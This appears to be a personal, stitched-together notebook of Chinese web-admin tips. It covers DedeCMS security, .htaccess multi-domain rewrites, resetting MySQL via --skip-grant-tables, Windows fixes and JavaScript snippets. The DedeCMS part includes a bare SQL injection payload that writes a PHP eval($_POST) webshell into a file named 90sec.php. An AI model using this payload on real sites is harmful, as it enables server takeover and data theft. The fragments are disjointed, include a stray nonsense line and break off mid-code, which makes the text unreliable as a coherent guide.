DedeCms做为国内使用最为广泛使用人数最多的CMS之一，经常爆出漏洞，每个漏洞的爆出，影响都是一大片，轻则被人挂广告、弹框，重则服务器成为肉机，宝贵数据丢失。那么有什么办法可以提高DedeCms的安全性呢？

　　先来看看原因吧，为什么PHP程序经常出漏洞，其实是由PHP程序本身决定的。PHP可复用性低，导致程序结构错综复杂，到处是冗余代码，这样 不仅利于漏洞的产生，还影响漏洞的修得；PHP程序入门简单且普遍开源，导致很多人都可直接阅读代码，搜寻漏洞；这样便有源源不断的漏洞被发现、被修复、 被发现……。而当前流行的PHP系统习惯用以文件形式做为缓存，这样就需要开放文件的写权限，这无疑成为PHP系统的软肋。目前针对PHP系统的攻击方 式，除了已经很少出现的“注入”攻击外，大部分攻击都是通过系统的某个漏洞，向可写文件里插入一句话木马，以此方式获得shell。

“可执行的文件不允许被修改，可写文件不允许被访问”这是网站权限控制的根本原则，网站程序在“可写文件不允许被访问”方面可做许多工作。

把所有可能 被侵入的文件夹 及里面的文件 改成 755 吧

eval是一个语言构造器而不是一个函数 所以无法 在 disable_functions 中禁用

mytag` (aid,expbody,normbody) VALUES(9013,@`\’`,’{dede:php}file_put_contents(”90sec.php”,”<?php eval($_POST[guige]);?>”);{/dede:php}’) # @`\’`

访问日志 是  access.log

错误日志是 error.log

在httpd.conf 中会找到它的路径

按住显示器 上面的几个按钮 

看如何重置  或者(恢复出厂设置)

在工作中遇到将多个域名绑定到一个空间上，
折腾一番然后用Apache的.htaccess解决了这个问题。
其实原理就是判断访问的域名然后指向不同的目录。
很简单，就直接贴内容了


代码里内容简述
m.heqee.com 和 wap.NAME.com 指向目录 wap
aaa.com/www.aaa.com 指向目录 aaa
bbb.com/www.bbb.com 指向目录 bbb

 <IfModule mod_rewrite.c>
  RewriteEngine on
  #301
  rewritecond %{http_host} ^NAME.com.biz [nc]
  rewriterule ^(.*)$ http://www.NAME.com/$1 [r=301,nc]
 
  # m/wap.heqee.com 二级目录

一个ok的htaccess

AddDefaultCharset UTF-8


<IfModule mod_rewrite.c>

RewriteEngine On
RewriteCond %{HTTP_HOST} ^aaa.com$ [NC]
RewriteRule ^(.*)$ http://www.aaa.com/$1 [R=301,L]

RewriteCond %{HTTP_USER_AGENT} "android|blackberry|googlebot-mobile|iemobile|iphone|ipod|opera mobile|palmos|webos" [NC]

RewriteRule ^(.*)$ http://3g.aaa.com/ [NC,R=301]

#给在线咨询做个伪静态

INSERT INTO bbb(aid,bid) select aid,5 from aaa

从aaa表中取所有数据 插到bbb表中

QQ群里面自动打用户名

@用户名(它是自动补全的)   就可以了

来自 http://ninghao.net/video/198

这个视频看批量处理字段(编辑删除)

dbo模块  http://ninghao.net/video/198 dbo模块

应该是vbo模块吧 views bulk oprations
http://drupal.org/project/taxonomy_multi_edit 批量修改分类

下面是最关键的一步

里面还有一步

可以的，可以用一个叫keyconfig的扩展。
Firefox的快捷键不提供直接修改，但是我们可以通过这个插件来做到：
Key Config

下载地址：http://forums.mozillazine.org/viewtopic.php?t=72994 

　步骤方法

　　单击“开始”按钮，选择“运行”，或者通过快捷键组合“win+R”打开“运行”对话框，在对话框中输入“regedit”，然后回车，此时打开“注册表编辑器”。

　　在“注册表编辑器”里面依次寻找到“HKEY_CURRENT_USER/Control panel/Desktop”该项，然后再右侧窗口里面，选中“WindowsArrangementActive”，右击该项的字符串值，选择“修改”。

安装某程序时无法通过windows installer 服务安装此安装程序包

1)我们到 控制面板的服务中 先启动 windows installer 服务(把它设为自动吧)

2)继续安装某程序,如果还是出现这个错误提示的话

百度 搜索 出现禁止恶意点击

一般情况下是 竞价 设置的情况 或者竞价设置的问题

阻止下载

文件 或文件夹比较工具 UltraCompare  这个工具不错 可以和  svn 的比较功能相媲美

Windows环境的找回方法：

范甘迪说法国

1、打开cmd命令窗口，先输入命令：

      net stop mysql    回车     #关闭mysql服务。

      进入到D:\SOFT_PHP_PACKAGE\mysql\bin\ 目录下，执行mysqld --skip-grant-tables  启动MySQL Server   (如果报错,执行mysqld-nt --skip-grant-tables)如图：

要进行百度分享的验证

进下面网站

http://share.baidu.com/analysis/general/

然后 http://share.baidu.com/analysis/verifydomain

 根据步骤一步步的来

(这个时候其实百度分享 代码 最要注意的是 代码里面的js 的uid参数)

//这两个好像是有区别的
window.location.href=location.href;
window.location.reload();


//指的是 在浏览器上的 url,,,当然在 浏览器上是伪静态,得出的 location.href 也是伪静态
alert(location.href);


<script>   
  alert("1:   "   +   window.location.href);   
  alert("2:   "   +   window.location);   
  alert("3:   "   +   location.href);   
  alert("4:   "   +   parent.location.href);   
  alert("5:   "   +   top.location.href);   
  alert("6:   "   +   document.location.href);   
</script>



 

dedecms建站是让广大朋友又爱又恨。爱是因为织梦dedecms的易用性，恨是因为使用dedecms网站的容易被挂马。估计使用dedecms建站的朋友80%被挂马过吧，当然我也是。一般是直接加入黑链就是js中被加入恶意转向。

织梦DEDECMS网站安全设置

解决IE6浏览器下position:fixed固定定位问题
发布于:2011-10-05 18:07 | 点击:113 | 评论:0
使元素固定在浏览器的顶部：#top{
_position:absolute;
_bottom:auto;
_top:expression(eval(document.documentElement.scrollTop));
}使元素固定在浏览器的底部：#top{
_position:absolute;
_bottom:auto;
_top:expression(eval(document.documentElement.scrollTop+document.documentElement.clientHeight-this.offsetHeight-(parseInt(this.currentStyle.marginTop,10)||0)-(parseInt(this.currentStyle.marginBottom,10)||0)));
}这两段代码只能实现在最底部跟最顶部，你可以使用 _margin-top:10px; 或者 _margin-bottom:10px; 修改其中的数值控制元素的位置。

setInterval(表达式,交互时间)
则不一样,它从载入后,每隔指定的时间就执行一次表达式

用setInterval实现的自动变化显示随机数的效果:

<html>
<head>
<script>
function sett()
{
document.body.innerHTML=Math.random();
}
setInterval("sett();", 500);
</script>
</script>
</head>
<body>
</body>
</html>


var MyMarss=setInterval(Marqueess,speedss);
tabss.onmouseover=function() {clearInterval(MyMarss)};//鼠标移上时清除定时器达到滚动停止的目的




setInterval(function(){